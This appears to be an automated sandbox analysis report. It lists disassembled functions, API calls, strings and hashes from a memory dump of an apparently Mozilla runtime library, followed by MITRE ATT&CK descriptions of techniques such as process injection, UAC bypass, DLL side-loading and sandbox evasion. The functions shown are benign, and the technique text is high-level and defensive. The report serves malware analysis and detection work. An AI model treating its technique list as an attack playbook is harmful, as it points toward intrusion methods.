Part of subcall function 658E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,658B4A68), ref: 658E945E
Part of subcall function 658E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 658E9470
Part of subcall function 658E9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 658E9482
Part of subcall function 658E9420: __Init_thread_footer.LIBCMT ref: 658E949F

GetCurrentThreadId.KERNEL32 ref: 658EF619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,658EF598), ref: 658EF621

Part of subcall function 658E94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 658E94EE
Part of subcall function 658E94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 658E9508

GetCurrentThreadId.KERNEL32 ref: 658EF637
AcquireSRWLockExclusive.KERNEL32(6592F4B8,?,?,00000000,?,658EF598), ref: 658EF645
ReleaseSRWLockExclusive.KERNEL32(6592F4B8,?,?,00000000,?,658EF598), ref: 658EF663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 658EF62A

Memory Dump Source

Source File: 0000000C.00000002.2644690067.00000000658A1000.00000020.00000001.01000000.00000027.sdmp, Offset: 658A0000, based on PE: true

Associated: 0000000C.00000002.2643997678.00000000658A0000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646142538.000000006591D000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646561764.000000006592E000.00000004.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2647031877.0000000065932000.00000002.00000001.01000000.00000027.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_658a0000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Similarity

API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 1579816589-753366533
Opcode ID: 27bf39b76a22714c29e27bdeef8c53704f647c7fb9fc4895a9442b8521baf759
Instruction ID: e27e765117c8be8cb8f099a5f22ac98b6294ded5277e9852148c67dbd37cb207
Opcode Fuzzy Hash: 27bf39b76a22714c29e27bdeef8c53704f647c7fb9fc4895a9442b8521baf759
Instruction Fuzzy Hash: 9B11E371238204ABCB00AF18D848DA5B7BEFB8776CB400815EA0687E41CF71AC12CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 659075B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6590748B,?), ref: 659075B8
GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 659075D7
FreeLibrary.KERNEL32(?,6590748B,?), ref: 659075EC

Strings

RtlNtStatusToDosError, xrefs: 659075D1
ntdll.dll, xrefs: 659075B3

Memory Dump Source

Source File: 0000000C.00000002.2644690067.00000000658A1000.00000020.00000001.01000000.00000027.sdmp, Offset: 658A0000, based on PE: true

Associated: 0000000C.00000002.2643997678.00000000658A0000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646142538.000000006591D000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646561764.000000006592E000.00000004.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2647031877.0000000065932000.00000002.00000001.01000000.00000027.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_658a0000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: RtlNtStatusToDosError$ntdll.dll
API String ID: 145871493-3641475894
Opcode ID: db6b6f19b51d2cc88ef2270b03b37499df1362f2ccf37bee8042bf91e6cd33b3
Instruction ID: f4b2fb8ec415f7e3ba07102bb38879d4fe4bf11b760e238016bea26f4b0f8f4b
Opcode Fuzzy Hash: db6b6f19b51d2cc88ef2270b03b37499df1362f2ccf37bee8042bf91e6cd33b3
Instruction Fuzzy Hash: 7CE0B67143C305ABEF006F62C84AB017AFDFB46218F044429A905D5241EFB0C28ACF92

Uniqueness

Uniqueness Score: -1.00%

Function 658ACDF0 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 658ACEBD
memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 658ACEF5
memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 658ACF4E

Strings

O'/, xrefs: 658ACE02
0, xrefs: 658ACF30

Memory Dump Source

Source File: 0000000C.00000002.2644690067.00000000658A1000.00000020.00000001.01000000.00000027.sdmp, Offset: 658A0000, based on PE: true

Associated: 0000000C.00000002.2643997678.00000000658A0000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646142538.000000006591D000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646561764.000000006592E000.00000004.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2647031877.0000000065932000.00000002.00000001.01000000.00000027.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_658a0000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Similarity

API ID: memcpy$memset
String ID: 0$O'/
API String ID: 438689982-3966553846
Opcode ID: 69e99c6abedd4895f190cfb113df7cebd1f69defe38cd35f1e0b6060e7cbd4af
Instruction ID: 365e68fcbef2e99e7886f6cd1ba18448d8080a4434db4e235674c9167cd7d090
Opcode Fuzzy Hash: 69e99c6abedd4895f190cfb113df7cebd1f69defe38cd35f1e0b6060e7cbd4af
Instruction Fuzzy Hash: B851F276A0421A8FCB00CF18C490AAABBA5EF99300F19859DEC595F352D771ED06CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 658E3DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,658AF20E,?), ref: 658E3DF5
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(658AF20E,00000000,?), ref: 658E3DFC
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 658E3E06
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 658E3E0E

Part of subcall function 658DCC00: GetCurrentProcess.KERNEL32(?,?,658A31A7), ref: 658DCC0D
Part of subcall function 658DCC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,658A31A7), ref: 658DCC16

Memory Dump Source

Source File: 0000000C.00000002.2644690067.00000000658A1000.00000020.00000001.01000000.00000027.sdmp, Offset: 658A0000, based on PE: true

Associated: 0000000C.00000002.2643997678.00000000658A0000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646142538.000000006591D000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646561764.000000006592E000.00000004.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2647031877.0000000065932000.00000002.00000001.01000000.00000027.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_658a0000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Similarity

API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
String ID:
API String ID: 2787204188-0
Opcode ID: 7f1cdb9f8c6e56ad69f99ee17e2d58138d560258296394430741af8743a5ddc3
Instruction ID: 93655bb9201906dde36dfbbb99b34aaa5f9e53ef57e502be16648ae40debdb51
Opcode Fuzzy Hash: 7f1cdb9f8c6e56ad69f99ee17e2d58138d560258296394430741af8743a5ddc3
Instruction Fuzzy Hash: B6F01CB1A642087BEB009F54DC82DAB376DEB46628F040420FE0957741DB35FE659AF7

Uniqueness

Uniqueness Score: -1.00%

Function 658F85B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 658F85D3

Part of subcall function 658BCA10: malloc.MOZGLUE(?), ref: 658BCA26

?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 658F8725

Strings

map/set<T> too long, xrefs: 658F8720

Memory Dump Source

Source File: 0000000C.00000002.2644690067.00000000658A1000.00000020.00000001.01000000.00000027.sdmp, Offset: 658A0000, based on PE: true

Associated: 0000000C.00000002.2643997678.00000000658A0000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646142538.000000006591D000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646561764.000000006592E000.00000004.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2647031877.0000000065932000.00000002.00000001.01000000.00000027.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_658a0000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Similarity

API ID: Xlength_error@std@@mallocmoz_xmalloc
String ID: map/set<T> too long
API String ID: 3720097785-1285458680
Opcode ID: c74f53cb20455a603012cd800dbab89f7e14778e2f3573300796e6aafc59c10f
Instruction ID: 51735227c354aed9826d170586e266b9e594f624330605c876046a24e595d3f3
Opcode Fuzzy Hash: c74f53cb20455a603012cd800dbab89f7e14778e2f3573300796e6aafc59c10f
Instruction Fuzzy Hash: AA5152B46046458FD701CF19C188B5ABBE1BF4A358F18C998D8595BB52C379EC82CF92

Uniqueness

Uniqueness Score: -1.00%

Function 65900DE0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111timeCOMMON

Download Yara Rule

APIs

Part of subcall function 658DFA80: GetCurrentThreadId.KERNEL32 ref: 658DFA8D
Part of subcall function 658DFA80: AcquireSRWLockExclusive.KERNEL32(6592F448), ref: 658DFA99

ReleaseSRWLockExclusive.KERNEL32(?), ref: 65900EFC

Part of subcall function 658F1B80: GetCurrentThreadId.KERNEL32 ref: 658F1B98
Part of subcall function 658F1B80: AcquireSRWLockExclusive.KERNEL32(?,?,658F1D96,00000000), ref: 658F1BA1
Part of subcall function 658F1B80: ReleaseSRWLockExclusive.KERNEL32(?,?,658F1D96,00000000), ref: 658F1BB5

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?), ref: 65900E50

Part of subcall function 658C5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,658C56EE,?,00000001), ref: 658C5B85
Part of subcall function 658C5B50: EnterCriticalSection.KERNEL32(6592F688,?,?,?,658C56EE,?,00000001), ref: 658C5B90
Part of subcall function 658C5B50: LeaveCriticalSection.KERNEL32(6592F688,?,?,?,658C56EE,?,00000001), ref: 658C5BD8
Part of subcall function 658C5B50: GetTickCount64.KERNEL32 ref: 658C5BE4

Strings

O'/, xrefs: 65900DF0

Memory Dump Source

Source File: 0000000C.00000002.2644690067.00000000658A1000.00000020.00000001.01000000.00000027.sdmp, Offset: 658A0000, based on PE: true

Associated: 0000000C.00000002.2643997678.00000000658A0000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646142538.000000006591D000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646561764.000000006592E000.00000004.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2647031877.0000000065932000.00000002.00000001.01000000.00000027.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_658a0000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Similarity

API ID: ExclusiveLock$AcquireCriticalCurrentReleaseSectionThread$Count64CounterEnterLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_
String ID: O'/
API String ID: 2508600278-3288639832
Opcode ID: 5aa02b25f32c6ea4705674c9ecf262cb7b01d622b4cd41c3c25dd95aa638a6ca
Instruction ID: 73135e352818e34602c898911fc785eb7801e423e02f8432b20ff8279b0ffd72
Opcode Fuzzy Hash: 5aa02b25f32c6ea4705674c9ecf262cb7b01d622b4cd41c3c25dd95aa638a6ca
Instruction Fuzzy Hash: ED4147756087469FCB08CF28C880A5AB7F5BF89318F804D1DE98A97741DB70EC49CB92

Uniqueness

Uniqueness Score: -1.00%

Function 65906DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 65906E22
__Init_thread_footer.LIBCMT ref: 65906E3F

Strings

MOZ_DISABLE_WALKTHESTACK, xrefs: 65906E1D

Memory Dump Source

Source File: 0000000C.00000002.2644690067.00000000658A1000.00000020.00000001.01000000.00000027.sdmp, Offset: 658A0000, based on PE: true

Associated: 0000000C.00000002.2643997678.00000000658A0000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646142538.000000006591D000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646561764.000000006592E000.00000004.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2647031877.0000000065932000.00000002.00000001.01000000.00000027.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_658a0000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Similarity

API ID: Init_thread_footergetenv
String ID: MOZ_DISABLE_WALKTHESTACK
API String ID: 1472356752-1153589363
Opcode ID: b96f6ac7cb2d828fb643d6b3fb8a9117f47e61a25654656ea6ece1c983a25a8d
Instruction ID: fa1af262d6c309bb0e694064f64607f7e10618086e8f9c73154752a4197e5506
Opcode Fuzzy Hash: b96f6ac7cb2d828fb643d6b3fb8a9117f47e61a25654656ea6ece1c983a25a8d
Instruction Fuzzy Hash: 14F024350383888BEA008BA8CA52A557762E74361CF044569C40506691CB21E9AACB53

Uniqueness

Uniqueness Score: -1.00%

Function 658FB5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,658FB2C9,?,?,?,658FB127,?,?,?,?,?,?,?,?,?,658FAE52), ref: 658FB628

Part of subcall function 658F90E0: free.MOZGLUE(?,00000000,?,?,658FDEDB), ref: 658F90FF
Part of subcall function 658F90E0: free.MOZGLUE(?,00000000,?,?,658FDEDB), ref: 658F9108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,658FB2C9,?,?,?,658FB127,?,?,?,?,?,?,?,?,?,658FAE52), ref: 658FB67D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,658FB2C9,?,?,?,658FB127,?,?,?,?,?,?,?,?,?,658FAE52), ref: 658FB708
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,658FB127,?,?,?,?,?,?,?,?), ref: 658FB74D

Memory Dump Source

Source File: 0000000C.00000002.2644690067.00000000658A1000.00000020.00000001.01000000.00000027.sdmp, Offset: 658A0000, based on PE: true

Associated: 0000000C.00000002.2643997678.00000000658A0000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646142538.000000006591D000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646561764.000000006592E000.00000004.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2647031877.0000000065932000.00000002.00000001.01000000.00000027.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_658a0000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 11050a1529375bec2b32798456c7cf1ee57ec848e7d8d6270a1a3067b5a27945
Instruction ID: 8b35e00f7ef7df1de3885a034bc3436b552f2b75fb2eeb993f60680b3506ca60
Opcode Fuzzy Hash: 11050a1529375bec2b32798456c7cf1ee57ec848e7d8d6270a1a3067b5a27945
Instruction Fuzzy Hash: 9D51A071A04216CFDB14CF58C98075EB7A5FF89386F45892DD85AAB710EB31EC06CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6590B580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,658B0A4D), ref: 6590B5EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,658B0A4D), ref: 6590B623
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,658B0A4D), ref: 6590B66C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,658B0A4D), ref: 6590B67F

Memory Dump Source

Source File: 0000000C.00000002.2644690067.00000000658A1000.00000020.00000001.01000000.00000027.sdmp, Offset: 658A0000, based on PE: true

Associated: 0000000C.00000002.2643997678.00000000658A0000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646142538.000000006591D000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646561764.000000006592E000.00000004.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2647031877.0000000065932000.00000002.00000001.01000000.00000027.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_658a0000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Similarity

API ID: malloc$free
String ID:
API String ID: 1480856625-0
Opcode ID: d3f86110f0f2ec56c2e49c4dfc9b7f3454d59acf2af99f8b491aeadb4c773bc1
Instruction ID: bd68c8a0eda896574fd75d9241d15ff454146fa1a14b83999add004026ec91b9
Opcode Fuzzy Hash: d3f86110f0f2ec56c2e49c4dfc9b7f3454d59acf2af99f8b491aeadb4c773bc1
Instruction Fuzzy Hash: A731C4719142168FDB10CF58C85466EBBFAFF81324F16896DC84ADB201EB31E915CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 658DF5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00010000), ref: 658DF611
memcpy.VCRUNTIME140(?,?,?), ref: 658DF623
memcpy.VCRUNTIME140(?,?,00010000), ref: 658DF652
memcpy.VCRUNTIME140(?,?,?), ref: 658DF668

Memory Dump Source

Source File: 0000000C.00000002.2644690067.00000000658A1000.00000020.00000001.01000000.00000027.sdmp, Offset: 658A0000, based on PE: true

Associated: 0000000C.00000002.2643997678.00000000658A0000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646142538.000000006591D000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646561764.000000006592E000.00000004.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2647031877.0000000065932000.00000002.00000001.01000000.00000027.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_658a0000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction ID: 3ef8d16410886f7588d687f46d73e36cc433f595143eef3c0f935678b5fb3a2e
Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction Fuzzy Hash: DF313071B00218AFCB24CF59DCC0A9AB7F5EB94354B148A39EA4A8BB04D631FD458B90

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
